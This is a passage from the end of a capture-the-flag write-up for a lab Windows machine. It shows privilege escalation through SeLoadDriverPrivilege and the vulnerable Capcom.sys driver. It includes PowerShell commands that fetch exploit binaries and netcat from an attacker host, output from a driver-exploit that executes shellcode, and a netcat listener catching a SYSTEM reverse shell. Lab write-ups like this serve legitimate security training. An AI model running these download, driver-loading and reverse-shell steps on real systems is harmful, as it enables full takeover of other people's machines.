Invoke-WebRequest 10.10.14.8:8002/ExploitCapcom.exe -UseBasicParsing -OutFile C:\Windows\Temp\ExploitCapcom.exe
Invoke-WebRequest 10.10.14.8:8002/nc64.exe -UseBasicParsing -OutFile C:\Windows\Temp\nc64.exe

and use the loader to create the service:

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Windows\Temp\Capcom.sys
.\ExploitCapcom.exe

This time it worked:

*Evil-WinRM* PS C:\Windows\Temp> ./downloader.ps1
The process cannot access the file 'C:\Windows\Temp\Capcom.sys' because it is being used by another process.
At C:\Windows\Temp\downloader.ps1:1 char:1
+ Invoke-WebRequest 10.10.14.8:8002/Capcom.sys -UseBasicParsing -OutFil ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c000010e, WinError: 0
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001DAE8910008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

And my nc listener just popped out with the root connection from fuse :P

nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.8] from fuse.htb [10.10.10.193] 49813
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\Temp>whoami
whoami
nt authority\system


C:\Users\Administrator\Desktop>type root.txt
type root.txt
bf184[.....]15d88c

This machine was hard for me because I was not familiar with driver permissions, so this time the enumeration and foothold were hard… but you know, sometimes trying hard works.

Thanks for reading!